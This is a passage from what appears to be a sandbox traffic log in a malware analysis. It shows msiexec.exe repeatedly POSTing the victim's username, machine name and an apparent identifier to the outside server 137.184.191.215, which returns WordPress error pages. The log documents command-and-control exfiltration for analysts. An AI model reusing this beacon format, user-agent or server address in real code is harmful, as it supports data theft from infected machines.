                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:29.245728970 CEST | 1236 | IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:29.245763063 CEST | 142 | IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      19 | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:29.398833990 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:29.403729916 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:31.998550892 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:29 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:31.998613119 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:31.998651981 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      20 | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:32.149645090 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:32.156332016 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:34.719510078 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:32 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:34.719544888 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:34.719567060 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      21 | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:34.889940023 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:34.894943953 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:37.488109112 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:35 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:37.488132000 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:37.488142014 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      22 | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:37.649485111 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:37.656692982 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:40.272311926 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:38 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:40.272363901 CEST | 224 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:40.272398949 CEST | 1236 | IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:40.272434950 CEST | 142 | IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      23 | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:40.675827026 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:40.680871010 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:43.361421108 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:41 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:43.361442089 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:43.361454964 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      24 | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:43.540724039 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:43.545598030 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:46.086179018 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:44 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:46.086235046 CEST | 224 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:46.086245060 CEST | 1236 | IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:46.086256027 CEST | 142 | IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      25 | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:46.235235929 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:46.240169048 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:48.810386896 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:46 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:48.810436010 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:48.810450077 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      26 | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:48.952227116 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:48.957160950 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:51.554064989 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:49 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:51.554079056 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:51.554090023 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.549745137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:51.710882902 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:51.716387033 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:54.256270885 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:52 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.549746137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:54.414530993 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:54.419846058 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:57.002209902 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.549747137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:57.158227921 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:57.163238049 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:59.701931953 CEST1236INHTTP/1.0 500 Internal Server Error
